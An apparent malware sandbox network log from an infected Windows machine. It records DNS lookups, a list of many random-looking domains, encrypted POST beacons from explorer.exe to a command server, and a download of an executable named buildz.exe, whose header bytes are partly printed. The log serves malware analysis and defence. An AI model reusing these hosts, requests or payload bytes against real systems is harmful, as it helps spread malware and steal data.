May 25, 2024 21:29:43.437458992 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		190.147.128.172	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444406986 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		213.172.74.157	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444406986 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		148.230.249.9	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444406986 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		201.119.118.19	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444406986 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		200.114.83.251	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444406986 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		58.151.148.90	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444406986 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		211.168.53.110	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444406986 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		200.122.37.247	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444406986 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		181.129.118.140	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444406986 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		201.113.204.230	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444406986 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		190.147.128.172	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444437981 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		213.172.74.157	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444437981 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		148.230.249.9	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444437981 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		201.119.118.19	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444437981 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		200.114.83.251	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444437981 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		58.151.148.90	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444437981 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		211.168.53.110	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444437981 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		200.122.37.247	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444437981 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		181.129.118.140	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444437981 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		201.113.204.230	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.444437981 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		190.147.128.172	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:45.203561068 CEST	1.1.1.1	192.168.2.4	0xaa3b	No error (0)	steamcommunity.com		104.102.42.29	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:52.816270113 CEST	1.1.1.1	192.168.2.4	0xf412	No error (0)	nessotechbd.com		192.185.16.114	A (IP address)	IN (0x0001)	false
May 25, 2024 21:30:24.203641891 CEST	1.1.1.1	192.168.2.4	0xf696	No error (0)	transfer.adttemp.com.br		104.196.109.209	A (IP address)	IN (0x0001)	false
May 25, 2024 21:30:31.660413027 CEST	1.1.1.1	192.168.2.4	0x7027	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)	false
May 25, 2024 21:30:31.660413027 CEST	1.1.1.1	192.168.2.4	0x7027	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)	false
May 25, 2024 21:30:31.660413027 CEST	1.1.1.1	192.168.2.4	0x7027	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)	false
May 25, 2024 21:30:31.660413027 CEST	1.1.1.1	192.168.2.4	0x7027	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)	false
May 25, 2024 21:30:31.660413027 CEST	1.1.1.1	192.168.2.4	0x7027	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)	false
May 25, 2024 21:30:43.059668064 CEST	1.1.1.1	192.168.2.4	0xc391	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

api.2ip.ua

www.safeautomationbd.com

steamcommunity.com

65.109.242.59

nessotechbd.com

transfer.adttemp.com.br

cdn.discordapp.com

kpyjjvqdiemoiebl.com

trad-einmyus.com

lelfqipvajp.com

jncoidythmtum.com

ecmpkonsxath.com

qhahtsyildlx.org

gdvgvnpnsfha.com

hexeftuymxc.net

vtxhrpouhnlhicef.org

sdfjhuz.com

cmovmgvridjjk.com

uopmqrlryhqym.com

kdrrcifvupv.net

froejfbfqcabvk.com

ijjaoopskaipyfot.org

qlrqehiwqptv.com

jkukpjjesbti.net

cajgtus.com

mxmwgpprwcpwxem.com

bglvkirrchdcy.com

syppprqoaeoyrm.org

syrimjyxlgxo.net

doewnlgtcbtsgiu.com

uetjtbokcendpi.net

obuibmhfpgvomgod.com

ukrvqlmerplrex.com

tldcvhhvnmxh.com

ncehelngswfsf.com

amrbjqbtgpnr.net

lejcpsbnxtuxdtx.org

trlgbchacigdlq.net

irythjvgtsstcpv.net

nwelovrvoirfrsd.org

xvkfgvcftmyct.com

jpkolefxkmrqfjw.org

91.92.253.69

duxgasiuxdjh.com

185.154.13.143

dejiweyxqsl.net

jyqccrxyqqnpjdg.org

193.233.132.167

thhfncmsprqy.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:23.042406082 CEST	286	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kpyjjvqdiemoiebl.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 206 Host: trad-einmyus.com
May 25, 2024 21:29:23.046097040 CEST	206	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 32 83 9d 33 Data Ascii: ?v1y5eCDhTz\Fu$f]d23H]qslZwXm*`W]DC#t?#Vr8.zcuDHY3(T>!?KfUqj;V#^-Sj
May 25, 2024 21:29:23.900290012 CEST	190	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:23 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 38 0d 0a 04 00 00 00 79 fa f7 1c 0d 0a 30 0d 0a 0d 0a Data Ascii: 8y0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:23.967891932 CEST	281	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lelfqipvajp.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 298 Host: trad-einmyus.com
May 25, 2024 21:29:23.967955112 CEST	298	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9e 66 5d 02 c8 a1 c1 64 07 9c dc 11 Data Ascii: ?v1y5eCDhTz\Fu$f]d,eh`WsnkFj:eI\fcE8'6j+;WW9K2:_W>RI_.nWKPyplsVE}e}[Sbi2yl$Hd0K?
May 25, 2024 21:29:24.697138071 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:24 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED] Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:24.807765961 CEST	283	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jncoidythmtum.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 293 Host: trad-einmyus.com
May 25, 2024 21:29:24.808000088 CEST	293	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9f 66 5d 02 c8 a1 c1 64 11 a0 ba 27 Data Ascii: ?v1y5eCDhTz\Fu$f]d'6Hnv\|0_p/S&yh//{-E:&(UODe#,m>IUGg"m#ch'W(JcH;}Hd2w*cvnd(-#oUpB'VS
May 25, 2024 21:29:25.521806955 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:25 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:25.627974033 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ecmpkonsxath.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 352 Host: trad-einmyus.com
May 25, 2024 21:29:25.628019094 CEST	352	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9c 66 5d 02 c8 a1 c1 64 21 c0 cc 23 Data Ascii: ?v1y5eCDhTz\Fu$f]d!#W}>FHTpG7O[xm:=h3'\d+yJ+9L/Qt Q"_Qq O'{UaKL*}%pz'r,CC[o^kAyP\|o9S;5"
May 25, 2024 21:29:26.362864017 CEST	262	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:26 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73\|"s2h3T'cSc"8iz`;?Dt0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:26.439460993 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qhahtsyildlx.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 193 Host: trad-einmyus.com
May 25, 2024 21:29:26.439519882 CEST	193	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 9c 66 5d 02 c9 a1 c1 64 3e ba ad 19 Data Ascii: ?v1y5eCDhTz\Fu$f]d>$dnEFAV"Jf7Z=<.I/B:V]93%"iW43)0O}-}>h{8q2nV
May 25, 2024 21:29:27.185319901 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:27 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED] Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:27.244514942 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gdvgvnpnsfha.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 191 Host: trad-einmyus.com
May 25, 2024 21:29:27.244514942 CEST	191	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9d 66 5d 02 c8 a1 c1 64 56 86 a1 1d Data Ascii: ?v1y5eCDhTz\Fu$f]dVKWFaAm`zx-x9B<4Z-:xOhz8YlWS2X?2qfa_?5c
May 25, 2024 21:29:27.978342056 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:28.037194014 CEST	281	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hexeftuymxc.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 279 Host: trad-einmyus.com
May 25, 2024 21:29:28.037194967 CEST	279	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9a 66 5d 02 c8 a1 c1 64 36 89 ca 36 Data Ascii: ?v1y5eCDhTz\Fu$f]d662\|j8"Hp &" 5jOeJ-- 5YM fIum$lG?'yc/cO&=1zX?u?YPX{=1]<9u{dE,
May 25, 2024 21:29:28.747720003 CEST	156	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:28 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	158.160.165.129	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:28.810993910 CEST	286	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vtxhrpouhnlhicef.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 368 Host: trad-einmyus.com
May 25, 2024 21:29:28.810993910 CEST	368	OUT	Data Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 9b 66 5d 02 c8 a1 c1 64 32 b5 83 36 Data Ascii: ?v1y5eCDhTz\Fu$f]d26,st<bEdA1o TGa`&]#vtT]*$'[B?%MN;9P&RaS6#.1:a9}qQBky)+F5"6u.sD}DkKIcu>=
May 25, 2024 21:29:29.545032024 CEST	227	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Sat, 25 May 2024 19:29:29 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 83 40 0d 63 07 ea e8 8f bd a7 5e a0 10 91 60 a2 5f 53 90 1f bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82O@c^`_S10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	189.163.126.89	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 25, 2024 21:29:33.389586926 CEST	162	OUT	GET /dl/buildz.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: sdfjhuz.com
May 25, 2024 21:29:34.543318987 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 25 May 2024 19:29:34 GMT Content-Type: application/octet-stream Content-Length: 751104 Last-Modified: Sat, 25 May 2024 19:20:05 GMT Connection: close ETag: "665239e5-b7600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c4 2a 01 d0 80 4b 6f 83 80 4b 6f 83 80 4b 6f 83 8d 19 b0 83 9a 4b 6f 83 8d 19 8f 83 f7 4b 6f 83 8d 19 8e 83 a7 4b 6f 83 89 33 fc 83 87 4b 6f 83 80 4b 6e 83 e8 4b 6f 83 35 d5 8e 83 81 4b 6f 83 8d 19 b4 83 81 4b 6f 83 35 d5 b1 83 81 4b 6f 83 52 69 63 68 80 4b 6f 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 25 39 28 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e4 00 00 00 5c 90 02 00 00 00 00 c7 43 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 91 02 00 04 00 00 45 4f 0c 00 02 00 00 81 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$*KoKoKoKoKoKo3KoKnKo5KoKo5KoRichKoPEL%9(d\C@`EOjPhTj`_@l.text `.rdataHrt@@.data`F\@.rsrch@@
May 25, 2024 21:29:34.545523882 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 9c 5f d0 02 e8 38 03 00 00 68 f6 f2 40 00 e8 53 18 00 00 59 c3 b9 a0 5f d0 02 e8 34 03 00 00 Data Ascii: _8h@SY_4h@=Y_0h@'Yj_Ej_8j_+j_3twQUYuH3tUUUwkP3Yu&U
May 25, 2024 21:29:34.553687096 CEST	1236	IN	Data Raw: 56 57 6a 01 8d 45 ff 8b f9 50 e8 ea 01 00 00 8b c8 e8 78 03 00 00 83 7d 08 00 8b f0 75 06 89 75 08 89 75 0c 8d 45 08 8b ce 50 e8 c7 02 00 00 8b c8 e8 82 fc ff ff 50 8d 45 ff 8b cf 50 e8 b7 01 00 00 8b c8 e8 2e fd ff ff 8d 45 0c 8b ce 50 e8 a5 02 Data Ascii: VWjEPx}uuuEPPEP.EP]PEP_^]@H(SVuWe};su'3EOu;vW+4;veFPEP ]4EM
May 25, 2024 21:29:34.553700924 CEST	1236	IN	Data Raw: ff 8b 18 89 30 8b 37 8b ce e8 17 fe ff ff 89 30 83 67 04 00 3b 1f 74 17 8b cb e8 03 fe ff ff 53 8b cf 8b 30 e8 e0 fc ff ff 8b de 3b 37 75 e9 5f 5e 5b c3 55 8b ec 83 7d 10 00 75 05 8b 45 08 5d c3 5d e9 c3 0e 00 00 e9 05 00 00 00 e9 0d 00 00 00 ff Data Ascii: 070g;tS0;7u_^[U}uE]]t$gYt$ZYUuYtMPuxE]Qt$L$cD$UQeEE]@%#4U3VUA8q Fr
May 25, 2024 21:29:34.560971022 CEST	864	IN	Data Raw: 45 08 8b e5 5d c2 08 00 55 8b ec 51 83 65 fc 00 83 7d 0c 01 75 0f 8b 4d 08 68 2c 04 41 00 e8 86 f4 ff ff eb 0b ff 75 0c ff 75 08 e8 ab ff ff ff 8b 45 08 8b e5 5d c2 08 00 55 8b ec 51 ff 75 0c 83 65 fc 00 e8 07 08 00 00 59 85 c0 b9 f4 03 41 00 0f Data Ascii: E]UQe}uMh,AuuE]UQueYAEQMLE]U}uE]]A A`AUQVWEPMP6_^]A)_Pd$SL$UV\$,D$ W{D$4F
May 25, 2024 21:29:34.655028105 CEST	1236	IN	Data Raw: bc 60 f5 1c 51 c7 45 b8 72 ef e8 00 c7 45 9c 1e 71 54 1a c7 45 b0 f1 f7 35 5a c7 45 94 ed 5d 7d 01 c7 85 70 ff ff ff c1 df bc 6d c7 45 c0 60 6b f1 32 c7 45 c4 45 25 6f 73 c7 45 ac 6c 19 18 72 c7 45 a8 3f 3c 6c 2d c7 45 c8 f7 fc 27 11 c7 45 a0 47 Data Ascii: `QErEqTE5ZE]}pmE`k2EE%osElrE?<l-E'EGiE$ESiE26YE9Yx+t9MeEETT2mEpmkE"Umz&i>EV\dm;YE-ik"teEmTADE8*@zeE8Y<6eE
May 25, 2024 21:29:34.657352924 CEST	1236	IN	Data Raw: 00 74 10 8b 4d 08 39 08 74 0d 83 c0 08 83 78 04 00 75 f3 33 c0 5d c3 8b 40 04 5d c3 55 8b ec 83 3d ec 04 41 00 00 b8 e8 04 41 00 74 10 8b 4d 08 39 08 74 0d 83 c0 08 83 78 04 00 75 f3 33 c0 5d c3 8b 40 04 5d c3 ff 35 d0 5f d0 02 ff 15 94 00 41 00 Data Ascii: tM9txu3]@]U=AAtM9txu3]@]5_AtjjdYY\|UuNYtuYt]jEEAPMhhdAEEAP;Vjj "YYVAPLujX^&3^jhPeA
May 25, 2024 21:29:34.661200047 CEST	1236	IN	Data Raw: 40 00 94 2b 40 00 8c 2b 40 00 84 2b 40 00 7c 2b 40 00 74 2b 40 00 6c 2b 40 00 8b 44 8e e4 89 44 8f e4 8b 44 8e e8 89 44 8f e8 8b 44 8e ec 89 44 8f ec 8b 44 8e f0 89 44 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 8f f8 8b 44 8e fc 89 44 8f fc Data Ascii: @+@+@+@\|+@t+@l+@DDDDDDDDDDDDDD$+@+@+@+@+@D$^_D$^_FGD$^_IFGFGD$^_t1\|9u$r$T-@$-@I
